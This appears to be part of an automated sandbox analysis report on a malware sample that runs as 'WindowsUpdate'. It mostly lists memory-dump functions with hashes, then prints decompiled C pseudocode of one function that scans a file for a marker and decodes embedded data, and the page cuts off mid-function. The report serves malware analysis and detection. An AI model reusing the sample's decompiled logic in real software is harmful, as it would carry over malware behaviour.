                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 04BA043A Relevance: .0, Instructions: 48COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.334006775.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_4ba0000_WindowsUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 83503cb60a15b927678caba601bdec5f94491b34a77b32df6f612b7efd1c88c1
                                                                                                                    • Instruction ID: 5161e5517c84c07475d56a38286b879584bb765a7561fe9a4a6ee25bacb39fbe
                                                                                                                    • Opcode Fuzzy Hash: 83503cb60a15b927678caba601bdec5f94491b34a77b32df6f612b7efd1c88c1
                                                                                                                    • Instruction Fuzzy Hash: 7A014F30A46244DFCB29DBB0C550AFEB776EF87305F2458EDC00267291CA769E52EA14
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 025405CF Relevance: .0, Instructions: 44COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333814681.0000000002540000.00000040.00000020.00020000.00000000.sdmp, Offset: 02540000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_2540000_WindowsUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d578544e93006e7bca9bd6a84a83e7b4c3162c24016bc41f7d113f5aed1bc7ec
                                                                                                                    • Instruction ID: ac93a66d2433af16c491e668f443ef17214a79d6857c6533e9e424167cc9c95c
                                                                                                                    • Opcode Fuzzy Hash: d578544e93006e7bca9bd6a84a83e7b4c3162c24016bc41f7d113f5aed1bc7ec
                                                                                                                    • Instruction Fuzzy Hash: EF01D6B25097805FD7128F16EC40862FFACEF86260709C09FEC498B612D225A905CB72
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 04BA3CCF Relevance: .0, Instructions: 44COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.334006775.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_4ba0000_WindowsUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9620f244a06b256586318b8f421ecf3a256a486670e1fc814cb412b431dbbb69
                                                                                                                    • Instruction ID: fe4c4c25f79ac904fa66d789ec17d26e136bb9b8536803cbcdf7ba086a4ef3b9
                                                                                                                    • Opcode Fuzzy Hash: 9620f244a06b256586318b8f421ecf3a256a486670e1fc814cb412b431dbbb69
                                                                                                                    • Instruction Fuzzy Hash: D2F0AF70946148EFCB14DFB4C5809AEBFB5DF47310F1011DAC844A3211D6319E52DE60
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 04BA00B1 Relevance: .0, Instructions: 41COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.334006775.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_4ba0000_WindowsUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 16b1508126445d074f75efb47b157ef60f617368d14c94f229bc640d4b7b4b71
                                                                                                                    • Instruction ID: 995156e839ff684223f8bdb4d9324c21a5913f3ebecd5ce255b3eece45676edf
                                                                                                                    • Opcode Fuzzy Hash: 16b1508126445d074f75efb47b157ef60f617368d14c94f229bc640d4b7b4b71
                                                                                                                    • Instruction Fuzzy Hash: CFF0AF309441499BCB689E74C496BFFFFB1EB46310F10456AD441B3282DA7558698BE0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 04BA0448 Relevance: .0, Instructions: 40COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.334006775.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_4ba0000_WindowsUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 6c8ce18790171c8cdb28b28ffe1a99455988b9a7ed07aa0c6816fa8dfb6ca8d2
                                                                                                                    • Instruction ID: 598c8f2e88a27a9817fe545f13e64a7649d0e8b8a66012b90f2f12363085b9df
                                                                                                                    • Opcode Fuzzy Hash: 6c8ce18790171c8cdb28b28ffe1a99455988b9a7ed07aa0c6816fa8dfb6ca8d2
                                                                                                                    • Instruction Fuzzy Hash: 5DF0FF30942208EFCB18DFB0C550AAEB376EF87305F2058A9940627294CF769E51EA54
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 04BA1528 Relevance: .0, Instructions: 37COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.334006775.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_4ba0000_WindowsUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d93b446afaf2768625ba82107b66064d474a17400d19d9bda084f9dd55c09aff
                                                                                                                    • Instruction ID: 4bb8be1723ee86ad88ab02e08a326c3a14b13230087352cf3c9522d28f7c53ca
                                                                                                                    • Opcode Fuzzy Hash: d93b446afaf2768625ba82107b66064d474a17400d19d9bda084f9dd55c09aff
                                                                                                                    • Instruction Fuzzy Hash: 74F0CD70944244AFCB18DFB8D4958EEBF72EF47221F2010DDC44273251CA306E16DB15
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 04BA081F Relevance: .0, Instructions: 36COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.334006775.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_4ba0000_WindowsUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 2fa4b30c811013e45ebca5cb02e19431258020f35834611445489e68fbcb131f
                                                                                                                    • Instruction ID: 18c9369a088eba5b7703b32d617e165cd94ca816eeaf4073ca9d40cd999df9c4
                                                                                                                    • Opcode Fuzzy Hash: 2fa4b30c811013e45ebca5cb02e19431258020f35834611445489e68fbcb131f
                                                                                                                    • Instruction Fuzzy Hash: 8501D674D04248DFCB04DFA8D5958ADFFF0EB59300F1485EAD844A7356D630AA16DB81
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 04BA0737 Relevance: .0, Instructions: 35COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.334006775.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_4ba0000_WindowsUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c66696815226459496f4707627eb559d32be9580f0675507a8bdaf4cdee46336
                                                                                                                    • Instruction ID: 101d36c6559df32236fa1c97fccc38f58103e4038b41aa1d2f2be6cd85393b1a
                                                                                                                    • Opcode Fuzzy Hash: c66696815226459496f4707627eb559d32be9580f0675507a8bdaf4cdee46336
                                                                                                                    • Instruction Fuzzy Hash: BAF03734C01208EFCB1ADFB8C18459DBFB1EF46310F204AE9C404A3206C7759965CF81
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 04BA00C0 Relevance: .0, Instructions: 33COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.334006775.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_4ba0000_WindowsUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e6aee13d7e487ee764935bfd5a73bba3f0e520deeca1400fbb64f0df9f4ae761
                                                                                                                    • Instruction ID: 2414ef22ce433e20f92cfab28e24f4307657a30e46dc9a2b52e7baade8282134
                                                                                                                    • Opcode Fuzzy Hash: e6aee13d7e487ee764935bfd5a73bba3f0e520deeca1400fbb64f0df9f4ae761
                                                                                                                    • Instruction Fuzzy Hash: F0F08270D5520D9BDB58EFB5C459BFFBAF5DB49300F10582AD400B3280DAB069648BE5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 02540818 Relevance: .0, Instructions: 31COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333814681.0000000002540000.00000040.00000020.00020000.00000000.sdmp, Offset: 02540000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_2540000_WindowsUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: fd0cf1e8c194960123ad76ce9629864bea5a1529a822a34ff7a6c9744e626607
                                                                                                                    • Instruction ID: ebbf5a1ee0e9850c4571ee2c8297bbaab89ab01004675b911647ed6e2c494ae6
                                                                                                                    • Opcode Fuzzy Hash: fd0cf1e8c194960123ad76ce9629864bea5a1529a822a34ff7a6c9744e626607
                                                                                                                    • Instruction Fuzzy Hash: 63F0FB35104644DFC216CF40D940F26FBA2FB89718F24C6A9E9490B652C737A813DA85
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 04BA0270 Relevance: .0, Instructions: 30COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.334006775.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_4ba0000_WindowsUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 87701b5276c77afc149958c3b0a863daff1c5f113828b12a2d99d2751ad8dc0f
                                                                                                                    • Instruction ID: 27850e25c12d10bc521ce626c8ce913186996c8ac2a658e6e0895b65da51043e
                                                                                                                    • Opcode Fuzzy Hash: 87701b5276c77afc149958c3b0a863daff1c5f113828b12a2d99d2751ad8dc0f
                                                                                                                    • Instruction Fuzzy Hash: FFF08C3490D388DFCF1ADFB8A0929DCBFB0EB47310F1481EAC84497242D6745A5ADB51
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 04BA1538 Relevance: .0, Instructions: 29COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.334006775.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_4ba0000_WindowsUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 73835d114825d3e409e81a0f505b095779a270526abbc950913864debf28f01d
                                                                                                                    • Instruction ID: 068787d1b6174bf2c8249276614ba06dbdec17385a01d2d67324ee8ee97c2a13
                                                                                                                    • Opcode Fuzzy Hash: 73835d114825d3e409e81a0f505b095779a270526abbc950913864debf28f01d
                                                                                                                    • Instruction Fuzzy Hash: 94F01C70941108EFCB08EFA8D55596EBB76EB46211F2020A9D80637350DB70AE54DB59
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 025405F6 Relevance: .0, Instructions: 27COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333814681.0000000002540000.00000040.00000020.00020000.00000000.sdmp, Offset: 02540000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_2540000_WindowsUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d0aa37ce3a99edc9c6449d38c8ba047e977ea49a0e3176c8b698b67285108e07
                                                                                                                    • Instruction ID: d822307194c509282b1590c0abccf9fe88cc1c6ce8f00cc47d7638ebaa110465
                                                                                                                    • Opcode Fuzzy Hash: d0aa37ce3a99edc9c6449d38c8ba047e977ea49a0e3176c8b698b67285108e07
                                                                                                                    • Instruction Fuzzy Hash: C9E06D76A046004BD650CF0BEC41862F7D8EB88670718C46BDC0D8B701E176B5058EA6
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 04BA0748 Relevance: .0, Instructions: 26COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.334006775.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_4ba0000_WindowsUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1ef9d4c60f3b1fa4b05d912bb9b03c23232afdfd5bc9ce57f54fe384b28d2a61
                                                                                                                    • Instruction ID: 8476396d9496fe66493f9a25faed3cc6b33ae498f66b193a563d583776e12244
                                                                                                                    • Opcode Fuzzy Hash: 1ef9d4c60f3b1fa4b05d912bb9b03c23232afdfd5bc9ce57f54fe384b28d2a61
                                                                                                                    • Instruction Fuzzy Hash: 83F01574C41208EFCB08EFB8C0445AEBBB4EB06301F2049A9C81063304D771AA60CF95
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 04BA3D18 Relevance: .0, Instructions: 22COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.334006775.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_4ba0000_WindowsUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 746e4a6ab03aedf045a202dd3497dfde1d23f4094ed29bdff97f613cd02b3c98
                                                                                                                    • Instruction ID: 1abb15296d176498131507ebea6ec5c625f7e6013a56c59de696ab437e6679f2
                                                                                                                    • Opcode Fuzzy Hash: 746e4a6ab03aedf045a202dd3497dfde1d23f4094ed29bdff97f613cd02b3c98
                                                                                                                    • Instruction Fuzzy Hash: 66E01234D01208EFCB04EFA8C1849ADBBB4EB4A310F1011AAC80463351EA70AE54CE95
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 04BA0280 Relevance: .0, Instructions: 21COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.334006775.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_4ba0000_WindowsUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 604b15270def17160008b1a8d852e173f41deafebf09c37f65534859adb5da41
                                                                                                                    • Instruction ID: 67903446a284b8e95e9da570c0391c91230ac24a7c66ad45a63e4f2cd8073fe8
                                                                                                                    • Opcode Fuzzy Hash: 604b15270def17160008b1a8d852e173f41deafebf09c37f65534859adb5da41
                                                                                                                    • Instruction Fuzzy Hash: 06E04F34D09309EFCF19EFA9E14599CBBB9EB45305F1040AAC80453300E770AE64DB81
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 04BA013E Relevance: .0, Instructions: 18COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.334006775.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_4ba0000_WindowsUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 161b9a8f09ac4d4c0d8ae282b3d8e3b77214e7825b5898ed24a7d9c2d3c71090
                                                                                                                    • Instruction ID: ae20f36362da220e046b16e0d2e8ac80732074baed8b1aff5660c3cd3386aa48
                                                                                                                    • Opcode Fuzzy Hash: 161b9a8f09ac4d4c0d8ae282b3d8e3b77214e7825b5898ed24a7d9c2d3c71090
                                                                                                                    • Instruction Fuzzy Hash: DDD01735E00108CBCB04DFA4E0842ECF774EB8A329F10986AC514B3200C3319465CF54
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 04BA3CE0 Relevance: .0, Instructions: 17COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.334006775.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_4ba0000_WindowsUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ff88b9ab066ea7d48846d196ab09ab5278425cf9cf66c96d47c3f036bbd5a7f6
                                                                                                                    • Instruction ID: c8c40f35cdacc5827886b37b7acf8289bc3f99d916b7ce03eabd64905ba6c400
                                                                                                                    • Opcode Fuzzy Hash: ff88b9ab066ea7d48846d196ab09ab5278425cf9cf66c96d47c3f036bbd5a7f6
                                                                                                                    • Instruction Fuzzy Hash: CDD0C770846308EBCB18DEA5D541A6AB77DDB43715F1024AE89042324197729E64DAA5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 024823F4 Relevance: .0, Instructions: 15COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333649899.0000000002482000.00000040.00000800.00020000.00000000.sdmp, Offset: 02482000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_2482000_WindowsUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3b1192861e2c80d05ca763e24d4e98eadc8323c7a4118901024244a615786c54
                                                                                                                    • Instruction ID: d564b20b98a0c6ae3d3f058fe30e68da9b5b874cae7d4e70bb923c4819108a47
                                                                                                                    • Opcode Fuzzy Hash: 3b1192861e2c80d05ca763e24d4e98eadc8323c7a4118901024244a615786c54
                                                                                                                    • Instruction Fuzzy Hash: 15D05E79225AD14FD326DA1CC1A9B9A3B94AB51B08F4644FAEC008B767C3A8D981D210
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 04BA011D Relevance: .0, Instructions: 15COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.334006775.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_4ba0000_WindowsUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b7dfac4980cf1962ebfd765a9d9d6578861c0d2e185d46a14669f09aca2a368b
                                                                                                                    • Instruction ID: f66f3b5ffb9ef8c91c679b7bd9e7c7ed0b92129dd62e6f46f2524e2188dd408e
                                                                                                                    • Opcode Fuzzy Hash: b7dfac4980cf1962ebfd765a9d9d6578861c0d2e185d46a14669f09aca2a368b
                                                                                                                    • Instruction Fuzzy Hash: 08D0C936E41108DF8B14CFE8E0404DCF775EB8A229F109466C514B3300C7329415CF64
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Non-executed Functions

                                                                                                                    Function 002CC197 Relevance: 23.2, APIs: 7, Strings: 6, Instructions: 410COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 63%
                                                                                                                    			E002CC197(void* __ebx, signed int __edx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				char _v24;
				char _v32;
				intOrPtr _v36;
				signed int _v40;
				intOrPtr _v44;
				char _v48;
				signed int _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				char _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v273;
				intOrPtr _v277;
				char _v278;
				short _v280;
				intOrPtr _v289;
				intOrPtr _v293;
				char _v294;
				short _v296;
				char _v304;
				char _v1328;
				char _v2352;
				char _v4400;
				char _v5552;
				char _v5680;
				char _v5808;
				char _v5809;
				char _v5816;
				char _v5820;
				intOrPtr _v5824;
				short _v5828;
				intOrPtr _v5832;
				intOrPtr _v5836;
				signed int _v5840;
				intOrPtr* _v5844;
				signed char* _v5848;
				char _v10160;
				char* _v10164;
				signed int _v10168;
				char* _v10172;
				char _v10176;
				signed char* _v10180;
				char _v10184;
				char _v10204;
				void* __ebp;
				void* _t160;
				signed int _t163;
				intOrPtr _t164;
				signed int _t168;
				signed int _t171;
				intOrPtr* _t172;
				signed char* _t180;
				signed int _t218;
				signed int _t221;
				intOrPtr* _t225;
				signed int _t227;
				signed int _t239;
				signed int _t246;
				signed int _t254;
				signed int _t256;
				void* _t260;
				intOrPtr _t264;
				signed char _t268;
				void* _t270;
				intOrPtr _t271;
				signed char* _t274;
				intOrPtr* _t286;
				signed int _t287;
				char _t289;
				void* _t301;
				signed char* _t303;
				intOrPtr* _t304;
				intOrPtr _t305;
				void* _t306;
				void* _t307;
				signed int _t309;
				signed int _t311;
				void* _t312;
				signed int _t313;
				signed int _t314;
				void* _t315;
				void* _t316;
				void* _t317;
				void* _t318;
				signed int _t320;

				_t308 = __esi;
				_t302 = __edi;
				_t298 = __edx;
				_t262 = __ebx;
				E00327307(0x16d4);
				_v8 =  *0x481f80 ^ _t313;
				_v5816 = 0;
				_v5820 = 0;
				_v5836 = 0xffc7d83;
				_v5832 = 0x69e8b38e;
				_v5828 = 0xaf73;
				_v5809 = 0xff;
				_t160 = E0032928A( &_v5820, _a4, 0x470850);
				_t271 = _v5820;
				_t316 = _t315 + 0xc;
				if(_t271 == 0) {
					L30:
					__eflags = _v8 ^ _t313;
					return E003272F2(_t160, _t262, _v8 ^ _t313, _t298, _t302, _t308);
				} else {
					_t325 = _t160;
					if(_t160 != 0) {
						goto L30;
					} else {
						_push(__ebx);
						_push(2);
						_push(_t160);
						_push(_t271);
						E003297FE(__ebx, __edi, __esi, _t325);
						_push(_v5820);
						_t163 = E00329BD6(__ebx, __edx, __edi, __esi, _t325);
						_t263 = _t163;
						_v5840 = _t163;
						_t164 = E00327BCE(_t163, __edi, _t163);
						_t317 = _t316 + 0x14;
						_v5824 = _t164;
						_t326 = _t164;
						if(_t164 != 0) {
							_push(__esi);
							_push(_v5820);
							E00329CFF(_t263, __edi, __esi, __eflags);
							_t264 = _v5824;
							E003296C3(_t264, _t263, 1, _v5820);
							_push(_v5820);
							E00329010(_t264, __edi, __esi, __eflags);
							_t168 = _v5840;
							_t318 = _t317 + 0x18;
							_t309 = 0;
							__eflags = _t168;
							if(_t168 == 0) {
								L29:
								_t160 = E00328F6C(_t264);
								_pop(_t308);
								_pop(_t262);
								goto L30;
							} else {
								_push(__edi);
								while(1) {
									_t171 = E00327FC7(_t309 + _t264, 8, _t168 - _t309);
									_t318 = _t318 + 0xc;
									__eflags = _t171;
									if(_t171 == 0) {
										break;
									}
									_t172 = _t171 + 1;
									_t22 = _t172 - 8; // -7
									_t274 = _t22;
									_t309 = _t172 - _t264;
									_v5844 = _t172;
									_t24 = _t172 + 8; // 0x9
									_t303 = _t24;
									__eflags = _t274 - _t264;
									if(_t274 < _t264) {
										L27:
										_t168 = _v5840;
										__eflags = _t309 - _t168;
										if(_t309 < _t168) {
											continue;
										} else {
											break;
										}
									} else {
										__eflags = _t303 - _v5840 + _t264;
										if(_t303 > _v5840 + _t264) {
											goto L27;
										} else {
											_t298 = ( *_t274 & 0x000000ff) << 0x00000018 | (_t274[1] & 0x000000ff) << 0x00000010;
											_v5848 =  &(_t274[2]);
											_t180 = _v5848;
											_t268 = ( *_t303 & 0x000000ff) << 0x00000018 | (_t303[1] & 0x000000ff) << 0x00000010 | (_t303[2] & 0x000000ff) << 0x00000008 | _t303[3] & 0x000000ff;
											_t282 = ( *_t180 & 0x000000ff) << 0x00000008 | _t180[1] & 0x000000ff | ( *_t274 & 0x000000ff) << 0x00000018 | (_t274[1] & 0x000000ff) << 0x00000010;
											__eflags = (( *_t180 & 0x000000ff) << 0x00000008 | _t180[1] & 0x000000ff | ( *_t274 & 0x000000ff) << 0x00000018 | (_t274[1] & 0x000000ff) << 0x00000010) - _t268 + 0x10;
											if((( *_t180 & 0x000000ff) << 0x00000008 | _t180[1] & 0x000000ff | ( *_t274 & 0x000000ff) << 0x00000018 | (_t274[1] & 0x000000ff) << 0x00000010) != _t268 + 0x10) {
												L26:
												_t264 = _v5824;
												goto L27;
											} else {
												__eflags = _t268 - _v5840 - _t309 - 0xc;
												if(_t268 > _v5840 - _t309 - 0xc) {
													goto L26;
												} else {
													__eflags = _t268 - 8;
													if(_t268 < 8) {
														goto L26;
													} else {
														__eflags = _t268 & 0x00000007;
														if((_t268 & 0x00000007) != 0) {
															goto L26;
														} else {
															asm("movq xmm0, [ebp-0x16c8]");
															_t304 = _v5844;
															_v296 = _v5828;
															_v294 = _v5809;
															asm("movq [ebp-0x12c], xmm0");
															_v293 =  *_t304;
															_v289 =  *((intOrPtr*)(_t304 + 4));
															_push(0x10);
															E002CBAD7(_t268,  &_v304, 0x13,  &_v32);
															asm("movq xmm0, [ebp-0x1c]");
															asm("movq [ebp-0x12c], xmm0");
															asm("movq xmm0, [ebp-0x14]");
															_v280 = _v5828;
															asm("movq [ebp-0x124], xmm0");
															asm("movq xmm0, [ebp-0x16c8]");
															_v278 = _v5809;
															asm("movq [ebp-0x11c], xmm0");
															_v277 =  *_t304;
															_v273 =  *((intOrPtr*)(_t304 + 4));
															_push(0x10);
															E002CBAD7(_t268,  &_v304, 0x23,  &_v48);
															E002D0397(_t282,  &_v32,  &_v5680);
															E002D0397(_t282,  &_v24,  &_v5808);
															E002D0397(_t282,  &_v48,  &_v5552);
															_v16 = _v40;
															_v12 = _v36;
															_v1328 = 0;
